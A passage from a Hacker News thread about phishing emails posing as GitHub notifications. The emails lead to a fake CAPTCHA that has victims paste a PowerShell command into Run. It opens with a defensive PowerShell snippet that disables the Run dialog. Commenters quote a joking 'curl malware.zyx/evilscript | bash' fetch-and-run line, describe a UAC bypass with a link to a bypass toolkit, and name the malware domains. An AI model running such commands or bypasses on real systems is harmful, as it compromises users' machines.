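$RunPolicyKey = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer'

function Set-RunDialogPolicy {
    param(
        [Parameter(Mandatory)]
        [ValidateSet('Disabled', 'Enabled')]
        [string]$State
    )
    # The Policies\Explorer key does not exist on a fresh profile; create it.
    if (-not (Test-Path $RunPolicyKey)) {
        New-Item -Path $RunPolicyKey -Force | Out-Null
    }
    if ($State -eq 'Disabled') {
        # NoRun = 1 removes Run from the Start menu and blocks Win+R in Explorer.
        New-ItemProperty -Path $RunPolicyKey -Name 'NoRun' -PropertyType DWord `
            -Value 1 -Force | Out-Null
    } else {
        # Deleting the value restores the default behaviour.
        Remove-ItemProperty -Path $RunPolicyKey -Name 'NoRun' -ErrorAction SilentlyContinue
    }
}

function Test-RunDialogDisabled {
    # Returns $true when the policy is set, so the state can be audited
    # before relying on it (a missing key or value yields $false).
    $value = Get-ItemProperty -Path $RunPolicyKey -Name 'NoRun' -ErrorAction SilentlyContinue
    return ($null -ne $value -and $value.NoRun -eq 1)
}

# Usage: apply the policy for this user and verify it was written.
Set-RunDialogPolicy -State Disabled
Test-RunDialogDisabled
```

NoRun only removes the Run dialog; it does not stop someone who opens a console themselves, so it is one layer next to the clipboard and email points raised in the thread.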
| chii wrote:
| > The clipboard strategy feels like it should be easy to
| block too
|
| yea, the browser should actually have each site ask for
| permission to modify the clipboard imho.
| bradjohnson wrote:
| That might add another step but I think it is unlikely to
| help reduce the number of victims. If someone is willing to
| bring up the run prompt and paste whatever they have in the
| clipboard they are also likely to be social engineered into
| clicking yes on a dialog that tells them to allow clipboard
| modification.
| justsomehnguy wrote:
| > Problem number 3, Windows still let you root a machine by 1
| line in powershell? What the @$$%&%&#$?
|
| _sigh_ It needs to be run under an account with admin
| privileges for that. The shield on the "Run" dialog screenshot
| clearly indicates that it was taken under a user with admin
| privileges and UAC disabled.
|
| Come on, now cry that Linux still lets you root a machine by 1
| line in curl malware.zyx/evilscript | bash.
| rl3 wrote:
| > _Come on, now cry that Linux still lets you root a machine
| by 1 line in curl malware.zyx /evilscript | bash._
|
| Excuse me, but some of us prefer to let evil scripts root our
| machines via pure _sh_ , thank you very much.
| koolba wrote:
| Glad I'm not the only one thinking about POSIX compliance!
| koolba wrote:
| > ... by 1 line in curl malware.zyx/evilscript | bash.
|
| Making the script POSIX compliant would allow hacking
| computers without bash. Then you can pipe it into just "sh"
| which is guaranteed to be on the PATH.
| chii wrote:
| > it was taken under a user with admin privileges and UAC
| disabled.
|
| you will have to accept that users either ask this UAC to be
| turned off, or it gets turned off by the original installer
| of the windows for the user (presumably non-technical user).
|
| It's like telling traffic accident sufferers that they
| should've put on a seatbelt. True, but pointless.
| Dalewyn wrote:
| >Windows still let you root a machine by 1 line in powershell?
| What the @$$%&%&#$?
|
| You say it's a problem, I say it is a virtue.
|
| We can "root" Windows because we _are_ root, specifically a
| user in the Administrators group because the first user account
| configured by Windows Setup is always an administrator account.
|
| This is a virtue. We can do whatever we want with the computer
| we own and use. This is freedom par excellence that literally
| every other operating system family today wishes they could do
| without getting shouted down.
|
| In an era of increasingly locked down operating systems that
| prevent us from truly owning our computers, _administering_
| them, Windows just lets us do that. I hope to god this never
| changes.
| darby_nine wrote:
| > This is a virtue. We can do whatever we want with the
| computer we own and use.
|
| You certainly don't need to do it with a single line of
| powershell though. At least, not without intentionally opting
| into it. For the most part on a daily basis I just want to
| _use_ my computer, not _modify_ it.
|
| Anyway, at the very least most functionality should be
| sandboxed so that if someone does something without your
| consent, it can't do much damage. Though this wasn't the
| original intention, leveraging user privileges and sandboxing
| applications by user is an effective way to do this.
|
| Besides what kind of moron would choose proprietary software
| if they wanted control of their machine? It's inherently a
| contradictory impulse.
| lyu07282 wrote:
| > At least, not without intentionally opting into it.
|
| just to clarify, in Windows, users with administrative
| privileges will in theory still be asked to opt in
| every time before any process is elevated to administrative
| rights. It's just that Windows security is so awful that
| people have found many different creative ways around it
| over the years, but those are (sometimes) getting patched
| by Microsoft so they are considered "bugs".
|
| For example a process stores its executable path in memory
| writable by itself, so you could start a process that
| replaces its executable string to "C:\Windows\explorer.exe"
| and it would (for whatever reason) bypass the "ask for
| administrative rights" dialog popup. This is the sort of
| "security" that Windows is built around to its very core.
|
| https://github.com/hfiref0x/UACME
|
| > "This tool shows ONLY popular UAC bypass method used by
| malware, and re-implement some of them in a different way
| improving original concepts. *There are different, not yet
| known to the general public, methods. Be aware of this;*"
|
| (also i think you are responding to a troll btw)
| Dalewyn wrote:
| >(also i think you are responding to a troll btw)
|
| You would be wrong.
| lyu07282 wrote:
| thats exactly what a troll would say though :p
| AdieuToLogic wrote:
| >>Windows still let you root a machine by 1 line in
| powershell? What the @$$%&%&#$?
|
| > We can do whatever we want with the computer we own and
| use.
|
| There is a difference between what an owner of a computer can
| and should be able to do, versus what an arbitrary actor can
| do to a computer they do not own through subterfuge. It is
| the responsibility of an Operating System to facilitate the
| former and guard against the latter.
|
| MS Windows has a poor history of being able to do either.
| Dalewyn wrote:
| Remember the old saying: With great power comes great
| responsibility.
|
| Windows just lets us do anything and everything, and it's
| up to us how we want to secure it if at all.
|
| Every other operating system family tries to realize
| security by straight up locking the user, the
| administrator, out of his own computer. They still get
| compromised, by the way.
|
| Windows has absolutely succeeded and continues to succeed
| in enabling the user, including security if he so desires.
| This is the reason Windows became the dominant desktop OS.
| The others? Nope on both counts. The Linux world in
| particular always screams about user freedom, yet
| ironically it's Windows and its community that actually
| makes that freedom a reality.
|
| Once more: I hope to god this never changes.
| nativeit wrote:
| This is a wild take. Would you mind expanding a bit on
| the oppressive, locked down ecosystem that's choking the
| free expression of Linux users?
| Dalewyn wrote:
| For starters it's security theater, given everyone and
| their dog prefixes sudo to all commands without much
| thinking. There are also some who just smash in _sudo -i_
| as the first thing they ever do upon boot (guilty as
| charged) because they suffer RSI from typing sudo a
| trillion times.
|
| There's also this impression that the operating system is
| just secure and you as the user are just protected like
| it's a law of physics. Spoiler alert, you are not and
| it's not a law of physics either. It's still your
| responsibility to secure the computer if you so desire
| and otherwise not do dumb shit like copypasta'ing
| commands from the internet.
|
| I'm not even going to get into the politics that are
| package managers and repos, that's just straight bullshit
| that has more to do with human nature than computer
| science.
|
| Speaking of politics, most of the FOSS community at large
| _hates_ users using and administrators administering
| computers how they want. You must subscribe to the One
| Libre Way(tm) or you are a heathen doing it wrong. So
| much for freedom. The Windows community meanwhile is
| mostly composed of jaded engineers who are just happy to
| see others get stuff done and get through another day in
| one piece.
|
| Windows from the start places the user at the controls
| with mostly no child safety locks in place (and you can
| remove what is there easily, eg: UAC), and with that
| power you have to accept that if you end up hosing the
| system the problem is you because Windows doesn't even
| pretend to really protect you.
|
| Having the sheer power to hose Windows with a single
| Powershell line is what freedom is. Freedom is both
| delightful and horrifying.
| AdieuToLogic wrote:
| What I am writing below I mean genuinely, without malice,
| and in the hope it helps dispel some of the conclusions
| you have expressed above, if not for Linux itself (which
| I do not normally use) then for other Unix operating
| systems such as FreeBSD[0].
|
| > For starters it's security theater, given everyone and
| their dog prefixes sudo to all commands without much
| thinking.
|
| Setting aside the hyperbole, such as "everyone and their
| dog prefixes sudo to all commands" and "most of the FOSS
| community at large hates users", user/group/other
| permissions are one part of security in depth. Excessive
| use of _sudo_ is indicative of an improperly configured
| system or use of software which lacks understanding of
| the OS which runs it. Both are causes for concern.
|
| > Windows from the start places the user at the controls
| with mostly no child safety locks in place ...
|
| To continue your analogy, child safety locks exist to
| minimize avoidable catastrophic situations for those
| unable to do same.
|
| > ... with that power you have to accept that if you end
| up hosing the system the problem is you because Windows
| doesn't even pretend to really protect you.
|
| At first glance, this has a "victim blaming" flavour to
| it along the lines of "you should have known better." A
| more concerning implication is that this perspective does
| not take into consideration what happens when a blackhat
| attack is perpetrated.
|
| What benefit is "the sheer power to hose Windows with a
| single Powershell line" when it is not you who executes
| it?
|
| 0 -
| https://docs.freebsd.org/en/books/handbook/introduction/
| Dalewyn wrote:
| You will have to excuse me for effectively ignoring the
| rest of your comment since what I'm about to point out
| more than makes up for the things you pointed out.
|
| >What benefit is "the sheer power to hose Windows with a
| single Powershell line" when it is not you who executes
| it?
|
| The benefit is the sheer power to hose Windows with a
| single Powershell line.
|
| In case that doesn't make sense, let me put it this way:
| The benefit is the power to do whatever you want with
| Windows.
|
| Windows essentially will not say no to what you ask of
| it, you have the freedom to do with your computer as you
| desire with Windows. With this power, this freedom, this
| virtue comes responsibility. _You_ as the user must
| secure the system as desired from the ground up, you have
| the power to do so and the responsibility.
|
| Computers are tools, Windows enabling your ability to use
| your computer as a tool is a virtue that is priceless
| especially in this day and age.
|
| If you don't believe me, consider that Windows brought
| forth the era of personal computing to the commons and
| continues to enable them by nurturing an ecosystem that
| can cater to almost all users' desires that now spans
| literally decades.
| bradjohnson wrote:
| I truly don't understand your desire to remove Linux file
| permissions. I also don't get why you think it's
| difficult to do so. There are plenty of ways for you to
| enable yourself to hose your machine without having to
| enter a password.
| kbolino wrote:
| > Windows from the start places the user at the controls
|
| Would this be the same Windows that now requires TPM2,
| UEFI Secure Boot, a Microsoft account to log in, and a
| special boot mode to use drivers not signed by Microsoft?
| gerdesj wrote:
| "I could see junior developers falling for this" - I can see
| all sorts fucking up, not just juniors. It is the way of
| things.
|
| "I don't think that...". I think that you have to train your
| troops effectively in what is harmfull.
|
| "Windows" - yes. I have been asked by at least two of my
| employees to get them away from Windows. I'll do my best. Its
| been a long running project but I will succeed.
| rpigab wrote:
| This captcha is so bad... I'm gonna automate the solving of
| this captcha so whenever my browser shows me "Press Win+R,
| CTRL+V <enter>", it automatically runs cmd.exe with the
| clipboard content so I can get to the site content faster and
| with no interruption.
|
| Yes, I'm a 10X Windows user.
| joshdavham wrote:
| These hackers need to work on the rest of their funnel lmao.
| Getting me to click the link would be easy, but running that
| script? Never in a million years!
| rwestergren wrote:
| On one hand, I can see the captcha is easy to fall for. On the
| other, nothing says "prove you aren't a machine" like "run this
| code that a machine could easily run."
| latexr wrote:
| > In text form (link altered for your safety)
|
| Might want to change the image too, macOS recognises the link in
| that and makes it clickable. I'd say that's more dangerous than
| modifying it in the text of the post, you could just as well
| include a non-clickable text link.
| johnklos wrote:
| Can be summarized with: Don't click on links in email.
|
| So is github-scanner.com (and github-scanner.shop) still the same
| malicious party? It seems to be. Funny that their DNS is hosted
| by Cloudflare (who, famously, don't host anything, because they
| think we're all dumb). Cloudflare, who take responsibility for
| nothing, has no way to report this kind of abuse to them.
|
| The domain which hosts the malware, 2x.si, both uses Cloudflare
| for DNS and is hosted by Cloudflare. At least it's possible to
| report this to Cloudflare, even though they rate limit humans and
| have CAPTCHAs on their abuse reporting forms.
|
| Sigh. Thanks to Cloudflare, it's trivial these days to host
| phishing and malware.
| elashri wrote:
| I don't know how effective or quick to respond they are, but
| there is a way to report malware [1]
|
| Extracting from the page
|
| > Which category of abuse to select > Phishing & Malware
|
| https://www.cloudflare.com/trust-hub/reporting-abuse/
| johnklos wrote:
| Cloudflare's abuse form will not let you submit the report if
| you don't include a URL that currently points to their
| network. There're no options for phishing / scam domains for
| which they're the registrar and/or DNS hosting.
| ToValueFunfetti wrote:
| I haven't tested the form, but they do claim you can report
| abuse of the registrar with some of the options, perhaps
| they've changed it?
|
| Failing that:
|
| > If Cloudflare is listed as the registrar on an ICANN
| WHOIS listing, you also can email reports related to our
| registrar services to registrar-abuse@cloudflare.com
| spoonfeeder006 wrote:
| So how do you not click links to confirm your email for a new
| account?
|
| Rather one could use Qubes OS and only open links in disposable
| VMs and never enter info beyond that
|
| That's basically what I do when I get emails to confirm my email
| address for a new account
|
| One can't always avoid clicking links can they?
| bentcorner wrote:
| > _So how do you not click links to confirm your email for a
| new account?_
|
| Fair question, but the "don't click links in email" is for
| emails that you don't expect. And sure, that's an
| unsatisfying answer because it's hard to communicate this
| wisdom to your grandmother.
|
| I think the best answer is defense-in-depth. Ensure you use
| updated email clients, browsers, and OS, and employ a dns
| blocker like a pihole or equivalent public service.
|
| For less-savvy people a device like an iPad or Chromebook can
| be a reasonable defense.
| hunter2_ wrote:
| If I'm being honest, "don't click links in email unless you
| were expecting that particular email message" seems easier
| for grandma than "update x, y, and z, and use Pihole"
| unless you want to administer her network and devices. But
| maybe you're saying that an iPad/Chromebook can mitigate
| all of the above needs? A little bit.
|
| Anyway, while I haven't heard of any cases yet, it wouldn't
| surprise me if senders of phishing email someday manage to
| deliver messages shortly after detecting some traffic (DNS
| lookup?) that you legitimately make with the entity the
| email is spoofing. Then you're expecting it, roughly.
| johnklos wrote:
| It is a bit easier, at least. My almost 90 year old Mom
| now knows to be suspicious of email and to not believe
| email unless she has a reason to think she should be
| getting it.
|
| To be fair about setting up a Pihole or some other form
| of DNS filtering, that's something that the network
| administrator should do, not individual users. It's a
| shame that it's still not trivial - companies that make
| NAT routers resist building in things that they don't
| completely control, so a configuration page for Pihole in
| your NAT router's web interface likely isn't coming soon.
| I hope that changes.
|
| Mom also understands that someone taking over her
| Nextdoor account would be a nuisance, whereas someone
| taking over her banking account would be significantly
| more problematic, so the more important something is, the
| more time she'll take to ascertain its authenticity.
|
| I practice explaining these things because I do it often.
| One interesting observation is that Mom believes me, so
| she does the things I suggest, whereas younger people
| think they know better, so they generally don't put much
| energy into my suggestions. I'm working on ways of
| showing people that they're not necessarily safe because
| they're "doing the same things they've always done, and
| nothing bad has happened yet".
| hunter2_ wrote:
| > a configuration page for Pihole in your NAT router's
| web interface likely isn't coming soon. I hope that
| changes.
|
| In the meantime, the majority of routers do allow you to
| specify the DNS resolver instead of using whatever it
| learns via WAN DHCP, so you could put in a filtered
| public resolver (as opposed to your own Pihole instance)
| which gives pretty similar results if you don't need to
| whitelist anything. Plus, you can do the same on mobile
| devices that roam beyond that router (and avoid VPN
| through said router). I've been using dns.adguard-dns.com
| (94.140.14.14 and 94.140.15.15) [0]. They were founded in
| Moscow but now operate out of Cyprus (EU) and I don't
| have much of a reason to trust any other DNS operator
| more than them.
|
| [0] https://adguard-dns.io/en/public-dns.html -- "method
| 2"
| poincaredisk wrote:
| Cloudflare is way more responsive to abuse requests than 95% of
| country level DNS registrars. Having experience working with
| both.
| TiredOfLife wrote:
| 95% more responsive than 0 is still 0.
| ipdashc wrote:
| > Don't click on links in email.
|
| Not saying you're wrong per se, but isn't it more so summarized
| with "don't fall for a 'CAPTCHA' that requires you to paste
| code into the window labeled 'This will run with administrative
| privileges'?"
|
| This is more so a grumble than a serious comment on security,
| but agh, it's always bugged me that the metric for failing
| phishing tests is "clicked on any link in the email" and not,
| you know, entered credentials into the phish site, or
| downloaded and opened a file. Like, I get it, it's much easier
| to teach nontechnical users to simply not click bad links than
| that other stuff - and browser vulns do exist - but it still
| vaguely annoys me.
|
| I feel like I've seen countless posts like this one that end in
| the user entering creds, giving the browser some weird
| permission, downloading some file (sometimes straight-up an
| executable), or in this case, running a command. I don't know
| if I've seen a single one that ends in "and then they clicked
| the link and it popped a browser 0-day and that was the end of
| that".
|
| Web browsers are a wide attack surface, yes, but they're
| also... intended for browsing the Internet. Most people click
| through links pretty haphazardly as they're doing work or
| researching a topic. Defense in depth and all, but I feel like
| a security policy that holds "don't visit any evil websites
| ever" as a core tenet is pretty flawed.
| fforflo wrote:
| While we're here: what happened to the GitHub explore newsletter?
| I really enjoyed this, but I've stopped receiving it for a few
| months now. And I don't think I unsubscribed.
| wazdra wrote:
| Fun how Microsoft is on both ends of the "exploit"
| avazhi wrote:
| If you're stupid enough to paste something off a random website
| (that you discovered through a random email link) into the
| command line (and then execute it), then you deserve what happens
| next. At some point the end user is to blame.
|
| I also have no clue why any reasonable person would refer to that
| monstrosity as a CAPTCHA.
| AlienRobot wrote:
| >verification steps >winkey+R >Ctrl+V >enter
|
| Of all things that seem legit, this seems the legitest.
| xwall wrote:
| OMG! I was getting similar GitHub notification emails, saying
| detected vulnerability in your repo, but never figured it out as
| fake before this news, anyway I never clicked because I'm a lazy
| programmer :), once it's written it's written I do rewrite the
| code but don't find bugs and fix in my code. :D
| romantomjak wrote:
| The GitHub security alert digest[1] is a real thing. It's a
| feature of GitHub where they report security vulnerabilities in
| your project's dependencies. For example, if you use python and
| you have specified requests library in your requirements.txt,
| GitHub will send you emails about disclosed vulnerabilities in
| that library, urging you to upgrade to a higher version where
| it's fixed.
|
| [1] https://docs.github.com/en/code-
| security/dependabot/dependab...
| bickett wrote:
| No org is safe, not even Github..
| dabbz wrote:
| I've also been seeing Typeform emails coming from spam sources.
| Somehow people are using Typeform's positive reputation score to
| send emails to arbitrary emails.
| halostatue wrote:
| I turned off _most_ GitHub emails and mostly use the Notification
| Centre for discovering things I need to know about. It's not
| _entirely_ proof against phishing this way, but it doesn't get
| to use email to appear more legitimate.
| mfi wrote:
| This has happened for a while. In February of this year, the same
| attack vector was used in an attack to trick developers into
| thinking that they'd got a job offer from GitHub:
| https://www.xorlab.com/en/blog/phishing-on-github
| dooer wrote:
| woah
| consumerx wrote:
| so many red-flags, i don't know how someone could go beyond and
| click this link.
| rnts08 wrote:
| It's quite sad that in 2024 we still have people falling for the
| simplest tricks.
|
| This is almost as easy as it was to call someone and ask them
| for the number of the modem on their desk and their logins back
| in the bad old days.
|
| Considering the target platform I'm not overly surprised though.
| jonny_eh wrote:
| It's quite sad that in 2024 HN commenters still blame the
| victim, especially when the original author does a great job
| suggesting small changes that Microsoft can make to make their
| products safer for their users.
| veltas wrote:
| I got a much more convincing email from PayPal recently, someone
| sent a quote (apparently a feature that can be used unsolicited),
| and set their company name to something like "PayPal need to get
| in touch about your recent payment of $499.00, please call
| +1-....", so this is most of the text at the top because their
| quotes email is "<name> is sending you a quote for $xxx".
|
| This email came from the real PayPal.com, how they haven't gotten
| on top of usernames like that is beyond me for a payment
| processor. I reported it to them but haven't heard anything back,
| hopefully they banned that account but they should ban all names
| like that.
|
| This email honestly was formatted to look like a legit PayPal
| email, I have to imagine that scam will trick a lot of normal
| people.
|
| Get in touch, see my bio website, if you want the email.
| akimbostrawman wrote:
| >This email honestly was formatted to look like a legit PayPal
| email,
|
| this is why anything but plain text should be blocked in emails
| (besides security reasons). anybody with 5 minutes of HTML
| experience can create "legit looking" emails.
| sofixa wrote:
| It was an actual email sent by PayPal via a service they
| propose (sending invoices), just with a smartly crafted
| company name that made it look like it's from them. No HTML was
| required from the attacker.
| veltas wrote:
| Legit looking because it was formatted by PayPal themselves,
| and also sent from PayPal.com.
| guappa wrote:
| I'd be surprised if someone looked at it.
| davidd_1004 wrote:
| Had this happen to me over a year ago so I assume reporting it
| to them did nothing :)
| reportgunner wrote:
| Why would paypal email you to call them ? If they want
| something from you they should either call you or email it to
| you or show it in their portal.
| veltas wrote:
| I don't know, most PayPal customers wouldn't know either. And
| the point is that these emails are designed to look legit and
| _also_ scare you into taking action without thinking about it
| too hard. And this particular email bypasses a lot of the
| rules in general consciousness about phishing like "check
| for spelling mistakes, check the sender email, does it look
| official, does it mention you by name", all of those boxes
| are ticked. This is only possible because PayPal clearly
| aren't actively fighting against these kinds of attacks.
| dyingkneepad wrote:
| I got a very similar thing: a legit email from PayPal, but it's
| an invoice and not a quote. And when you login to PayPal the
| website shows nothing.
| 1f60c wrote:
| Nice writeup! It reminded me a bit of Julia Evans' blog in terms
| of content (learning by teaching).
| jonathanlydall wrote:
| Just this morning I logged a bug on a GitHub repo and within a
| minute someone responded with something to the effect of:
|
| Try this, I think it will fix your issue (install GCC if you need
| a compiler): (Bitly link redirecting to zip file on mediafire)
| Pass: (something)
|
| GitHub processed my abuse report within an hour and removed all
| posts by that user.
| meindnoch wrote:
| Not hijacked. Faked.
| Thomashuet wrote:
| Their claim that nothing tells you the email corresponds to the
| new issue is wrong, the "(Issue #1)" in the title means exactly
| that. I have actually received the same email myself and
| immediately recognized it as a new issue created on the repo.
| This user is obviously not used to GitHub issues as is made clear
| by the fact that this is the first issue on this repo. I guess
| GitHub needs to do a better job teaching new users.
| selykg wrote:
| True, but I have worked at companies who employ users that
| maybe aren't entirely up to speed on the technical details and
| they have GitHub accounts for submitting bug reports. This
| would very easily fool some of these people.
|
| Technical people might spot this, but that also isn't a free
| pass for GitHub to not do better here.
| ezekiel68 wrote:
| An excellent slashvertisement for Virus Total. Wrapped in an
| important cautionary tale about how GitHub issues can be
| manipulated to try to spread malware.
___________________________________________________________________
(page generated 2024-09-20 23:01 UTC)